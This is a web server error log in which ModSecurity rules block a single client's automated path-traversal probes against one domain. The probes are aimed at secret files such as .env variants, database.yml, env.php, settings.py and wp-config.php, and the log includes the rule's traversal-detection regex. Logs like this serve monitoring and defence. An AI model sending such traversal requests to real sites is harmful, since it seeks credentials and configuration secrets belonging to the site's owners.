[Tue May 12 05:24:43.506577 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKde_aAnTZtx1_H_wy2fQAAAVA"]
[Tue May 12 05:24:43.506785 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKde_aAnTZtx1_H_wy2fQAAAVA"]
[Tue May 12 05:24:45.284079 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKde_aAnTZtx1_H_wy2fQAAAVA"]
[Tue May 12 05:24:45.301973 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdffaAnTZtx1_H_wy2ggAAAVA"]
[Tue May 12 05:24:45.302045 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdffaAnTZtx1_H_wy2ggAAAVA"]
[Tue May 12 05:24:45.302209 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdffaAnTZtx1_H_wy2ggAAAVA"]
[Tue May 12 05:24:47.025218 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdffaAnTZtx1_H_wy2ggAAAVA"]
[Tue May 12 05:24:47.042287 2026] [core:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 05:24:48.796917 2026] [core:error] [pid 1842385:tid 1842414] [client 45.148.10.238:42010] AH10244: invalid URI path (/uploads../../../../.env)
[Tue May 12 05:24:50.550844 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdgs1tk6y7yBJLpJo43AAAAJE"]
[Tue May 12 05:24:50.550956 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdgs1tk6y7yBJLpJo43AAAAJE"]
[Tue May 12 05:24:50.551143 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdgs1tk6y7yBJLpJo43AAAAJE"]
[Tue May 12 05:24:52.249792 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdgs1tk6y7yBJLpJo43AAAAJE"]
[Tue May 12 05:24:52.269014 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdhM1tk6y7yBJLpJo43QAAAJE"]
[Tue May 12 05:24:52.269084 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdhM1tk6y7yBJLpJo43QAAAJE"]
[Tue May 12 05:24:52.269254 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdhM1tk6y7yBJLpJo43QAAAJE"]
[Tue May 12 05:24:53.968954 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdhM1tk6y7yBJLpJo43QAAAJE"]
[Tue May 12 05:24:53.987994 2026] [access_compat:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:24:56.730938 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdiM1tk6y7yBJLpJo44wAAAJE"]
[Tue May 12 05:24:56.731149 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdiM1tk6y7yBJLpJo44wAAAJE"]
[Tue May 12 05:24:58.457017 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdiM1tk6y7yBJLpJo44wAAAJE"]
[Tue May 12 05:24:58.476266 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdis1tk6y7yBJLpJo45gAAAJE"]
[Tue May 12 05:24:58.476469 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdis1tk6y7yBJLpJo45gAAAJE"]
[Tue May 12 05:25:01.236752 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdis1tk6y7yBJLpJo45gAAAJE"]
[Tue May 12 05:25:01.256053 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdjc1tk6y7yBJLpJo46AAAAJE"]
[Tue May 12 05:25:01.256259 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdjc1tk6y7yBJLpJo46AAAAJE"]
[Tue May 12 05:25:03.006248 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdjc1tk6y7yBJLpJo46AAAAJE"]
[Tue May 12 05:25:03.025652 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdj81tk6y7yBJLpJo46gAAAJE"]
[Tue May 12 05:25:03.025729 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdj81tk6y7yBJLpJo46gAAAJE"]
[Tue May 12 05:25:03.025902 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdj81tk6y7yBJLpJo46gAAAJE"]
[Tue May 12 05:25:04.760320 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdj81tk6y7yBJLpJo46gAAAJE"]
[Tue May 12 05:25:04.779213 2026] [core:error] [pid 1820198:tid 1820217] [client 45.148.10.238:42016] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 05:25:06.562087 2026] [core:error] [pid 1842385:tid 1842406] [client 45.148.10.238:36838] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 05:25:08.801099 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdlNr1yOh9TvizeziegAAAAEE"]
[Tue May 12 05:25:08.801186 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdlNr1yOh9TvizeziegAAAAEE"]
[Tue May 12 05:25:08.801369 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdlNr1yOh9TvizeziegAAAAEE"]
[Tue May 12 05:25:10.507026 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdlNr1yOh9TvizeziegAAAAEE"]
